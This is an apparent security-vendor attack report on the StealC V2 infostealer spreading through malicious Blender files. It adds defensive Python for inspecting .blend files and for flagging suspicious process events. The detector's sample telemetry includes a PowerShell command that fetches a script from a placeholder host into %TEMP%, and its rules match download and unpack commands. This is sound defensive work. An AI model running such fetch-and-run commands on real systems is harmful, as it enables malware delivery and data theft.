StealC V2 Spreads via Malicious Blender Files

Red | Attack Report

Summary

The StealC V2 campaign is a multi-stage attack that uses malicious Blender files to deliver the StealC V2 infostealer to users worldwide. Discovered in 2025, it abuses Blender's ability to auto-execute embedded Python scripts by hiding weaponized code inside seemingly harmless .blend 3D model files shared on popular asset platforms such as CGTrader. The campaign has been active for at least six months, and evidence links the operation to Russian-speaking threat actors. The infection chain starts when a victim opens a malicious Blender file: a concealed Python script runs automatically, downloads a loader and a PowerShell script, fetches ZIP bundles, and establishes a full Pyramid C2 infrastructure. The infostealer targets Windows, macOS, and Linux, harvesting sensitive data from over 23 browsers, more than 100 plugins and extensions, cryptocurrency wallets, messaging applications, VPN clients, and email programs. The campaign shows how attackers weaponize trusted creative tools, turning a legitimate workflow into an unexpected vector for intrusion and data theft.

Attack Details

The campaign exploits Blender Foundation files to deliver the rapidly evolving StealC V2 infostealer through a multi-stage attack chain. For at least six months, the operators have been quietly uploading malicious .blend files to platforms such as CGTrader, disguised as ordinary 3D assets. When opened in Blender, these files trigger concealed Python scripts that run automatically, turning a trusted creative tool into a silent malware delivery mechanism.

Blender's popularity among 3D artists and designers is central to the campaign's success. As a free, open-source 3D creation suite that supports modeling, animation, and rendering, with a thriving add-on ecosystem across all major operating systems, Blender attracts millions of users worldwide. Its flexibility and community-driven growth make it attractive to professionals and hobbyists alike, but the same flexibility introduces the risk the attackers exploit: Blender allows Python scripts to be embedded directly in .blend files, and when Auto Run is enabled those scripts execute the moment the file is opened.

Although the Blender community had previously issued general warnings about malicious Blender files, none of those discussions tied the activity to StealC V2 or to any recognized threat actor. New evidence now points to Russian-speaking operators whose distribution tactics resemble earlier campaigns, including one that impersonated the Electronic Frontier Foundation (EFF) to target Albion Online players. Both operations share the same attack patterns: deceptive lure files, background execution chains, and Pyramid C2 infrastructure to manage the attack.

The attack begins when a user opens a malicious .blend file containing a weaponized Python script. If script auto-execution is enabled, the script retrieves a loader from a remote server, which in turn downloads a PowerShell script that pulls down two ZIP archives. One archive contains a Python environment housing StealC V2; the other delivers an auxiliary Python-based stealer component. Both unpack into the %TEMP% directory, where hidden LNK files are executed and made persistent through the Windows Startup folder. The chain culminates in the deployment of a Pyramid C2 module, whose ChaCha20-encrypted Python scripts fetch additional payloads.

The final payload is a capable infostealer that has evolved rapidly since its introduction in April 2025. StealC V2 extracts data from more than 23 browsers, over 100 plugins and extensions, numerous cryptocurrency wallets, messaging applications, VPN clients, and email clients. It also carries an upgraded UAC bypass, allowing it to run with elevated privileges without user consent. The campaign is a reminder that even trusted creative tools can be weaponized by sophisticated threat actors, and it underscores the need for careful file handling and stronger security awareness training across creative industries.

Recommendations

Be Cautious when Downloading 3D Assets: The campaign relies on users downloading malicious Blender models from compromised or malicious sources. Download Blender models only from trusted creators or verified marketplaces with strong reputation systems. If a file looks unusual, has very few downloads, or comes from an unknown uploader, do not open it. Verify the authenticity of 3D assets before use.

Disable Auto Run for Python Scripts in Blender: The attack depends on Blender's Auto Run feature, which lets embedded Python scripts execute automatically when a .blend file is opened. Navigate to Edit → Preferences → File Paths in Blender and make sure Auto Run is disabled unless your workflow strictly requires it. Disabling Auto Run breaks the infection chain at its first execution stage, so the embedded script never runs.

Scan Downloaded Files Before Opening: Even when a Blender file appears harmless, the operators hide malicious code inside otherwise normal 3D assets. Run every downloaded .blend file through antivirus or endpoint security tooling before opening it in Blender; this can catch known StealC V2 signatures and behavioral indicators before anything executes.
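As an added example (not part of the advisory), the following Python script supports both the embedded-script point in the Attack Details and the scan-before-opening recommendation: it walks the file-block headers of an uncompressed .blend file and counts the Text datablocks, which is where a script that Auto Run would execute is stored, without ever loading the file in Blender. It assumes Blender's classic 12-byte header (compressed files must be decompressed first), and the sample bytes are constructed.

```python
import struct

# Classic .blend header (12 bytes): b"BLENDER", pointer size ('_' = 4, '-' = 8),
# endianness ('v' = little, 'V' = big), three-character version, e.g. b"BLENDER-v280".
BLEND_MAGIC = b"BLENDER"
TEXT_CODE = b"TX\x00\x00"   # block code of a Text datablock (embedded script or text)


def _header_struct(ptr_size, endian):
    # File-block header: code[4] size[int32] old_address[ptr] sdna_index[int32] count[int32]
    return struct.Struct(f"{endian}4si{'I' if ptr_size == 4 else 'Q'}ii")


def list_blocks(data):
    """Walk an uncompressed .blend and return (code, size, count) for each file block.
    Raises ValueError for compressed, truncated or otherwise malformed input."""
    if len(data) < 12 or data[:7] != BLEND_MAGIC:
        raise ValueError("not an uncompressed .blend (zstd/gzip files need decompressing first)")
    ptr_size = {"_": 4, "-": 8}.get(chr(data[7]))
    endian = {"v": "<", "V": ">"}.get(chr(data[8]))
    if ptr_size is None or endian is None:
        raise ValueError("unrecognised pointer-size/endianness bytes in header")
    hdr = _header_struct(ptr_size, endian)
    blocks, pos = [], 12
    while pos + hdr.size <= len(data):
        code, size, _addr, _sdna, count = hdr.unpack_from(data, pos)
        if code == b"ENDB":
            return blocks
        if size < 0 or pos + hdr.size + size > len(data):
            raise ValueError(f"block {code!r} at offset {pos} overruns the file")
        blocks.append((code, size, count))
        pos += hdr.size + size
    raise ValueError("truncated .blend: no ENDB block found")


def count_text_blocks(data):
    """Number of Text datablocks. A non-zero count is a reason to review the file
    before opening it with Auto Run enabled, not proof of malice."""
    return sum(1 for code, _, _ in list_blocks(data) if code == TEXT_CODE)


def _make_block(code, payload, ptr_size=8, endian="<"):
    # Builds one file block for the constructed sample below.
    return _header_struct(ptr_size, endian).pack(code, len(payload), 0, 0, 1) + payload


# Constructed sample: 64-bit little-endian "v280" file with one Text datablock.
SAMPLE_BLEND = (b"BLENDER-v280"
                + _make_block(b"GLOB", b"\x00" * 16)
                + _make_block(TEXT_CODE, b"\x00" * 32)
                + _make_block(b"ENDB", b""))
```

Run `count_text_blocks(open(path, "rb").read())` on a downloaded file; scripts attached in other ways are not covered, so treat a zero as "nothing obvious" rather than "clean".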

Review Your Startup Folder Regularly: The malware persists by hiding malicious shortcuts (LNK files) in the Windows Startup folder so they run at every boot. Inspect the Startup folder regularly for suspicious entries and remove any unfamiliar LNK files; removing this persistence mechanism prevents StealC V2 from re-establishing control after a restart.

Enhance Endpoint Protection: Deploy next-generation antivirus (NGAV) and endpoint detection and response (EDR) tooling configured to detect StealC V2 behaviors. Use behavioral analysis and machine-learning-based detection to flag patterns such as Python script execution from %TEMP%, unusual PowerShell activity, ChaCha20 encryption operations, and data exfiltration to known Pyramid C2 infrastructure. EDR gives multiple opportunities to interrupt the kill chain across its multi-stage infection process.
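To make those behavioral indicators concrete, here is an added Python example (not from the advisory or any vendor product) that classifies process-creation records against the stages described in the Attack Details: Blender spawning a shell, PowerShell fetching and unpacking archives, Python running out of %TEMP%, and an LNK placed in the Startup folder. The profile paths, the Blender install location and the sample events are all constructed assumptions.

```python
import ntpath
from dataclasses import dataclass

# Assumed paths for a sample user profile (not values from the advisory).
TEMP_DIR = r"C:\Users\alice\AppData\Local\Temp"
STARTUP_DIR = (r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup")
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
PYTHON = {"python.exe", "pythonw.exe"}
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "expand-archive")


@dataclass
class ProcEvent:
    """One process-creation record, shaped like Sysmon Event ID 1 fields."""
    parent_image: str
    image: str
    command_line: str


def classify(ev):
    """Return the names of the StealC V2 chain stages this event resembles."""
    parent = ntpath.basename(ev.parent_image).lower()   # ntpath handles Windows paths anywhere
    child = ntpath.basename(ev.image).lower()
    image, cmd = ev.image.lower(), ev.command_line.lower()
    hits = []
    # Stage 1: the script embedded in the .blend hands off to a shell or PowerShell.
    if parent == "blender.exe" and child in SHELLS:
        hits.append("shell spawned by Blender")
    # Stage 2: a shell fetching and unpacking the ZIP bundles.
    if child in SHELLS and any(k in cmd for k in DOWNLOAD_HINTS):
        hits.append("download/unpack via shell")
    # Stage 3: the unpacked Python environment running out of %TEMP%.
    if child in PYTHON and (image.startswith(TEMP_DIR.lower()) or TEMP_DIR.lower() in cmd):
        hits.append("python executed from %TEMP%")
    # Persistence: a command touching an LNK inside the Startup folder.
    if STARTUP_DIR.lower() in cmd and ".lnk" in cmd:
        hits.append("LNK in Startup folder")
    return hits


BLENDER = r"C:\Program Files\Blender Foundation\Blender 4.2\blender.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not from a real incident
    ProcEvent(BLENDER, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "Invoke-WebRequest http://example.invalid/l.ps1 -OutFile $env:TEMP\\l.ps1"'),
    ProcEvent(r"C:\Windows\explorer.exe", TEMP_DIR + r"\env\pythonw.exe",
              TEMP_DIR + r"\env\pythonw.exe " + TEMP_DIR + r"\env\run.py"),
    ProcEvent(BLENDER, BLENDER, "blender --background"),
]


def triage(events):
    """Return (image name, reasons) for every event that matched at least one rule."""
    return [(ntpath.basename(e.image), r) for e in events if (r := classify(e))]
```

Feed real Sysmon or EDR process-creation events into `triage` by mapping ParentImage, Image and CommandLine onto `ProcEvent`; a single hit is a lead to investigate, while several hits in one session closely match the chain described above.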

Indicators of Compromise (IOCs)

IPv4 Addresses:

URLs:

SHA256 Hashes:


MITRE ATT&CK TTPs

Initial Access:

  • T1566: Phishing
  • T1190: Exploit Public-Facing Application

Execution:

  • T1059: Command and Scripting Interpreter
  • T1059.001: PowerShell
  • T1059.006: Python
  • T1204: User Execution

Persistence:

  • T1547: Boot or Logon Autostart Execution
  • T1547.001: Registry Run Keys / Startup Folder

Privilege Escalation:

  • T1548: Abuse Elevation Control Mechanism
  • T1548.002: Bypass User Account Control

Defense Evasion:

  • T1027: Obfuscated Files or Information
  • T1140: Deobfuscate/Decode Files or Information
  • T1036: Masquerading

Credential Access:

  • T1555: Credentials from Password Stores
  • T1555.003: Credentials from Web Browsers

Collection:

  • (Implicit from attack description – browser data, credentials, wallets)

Command and Control:

  • T1071: Application Layer Protocol

Exfiltration:

  • T1041: Exfiltration Over C2 Channel
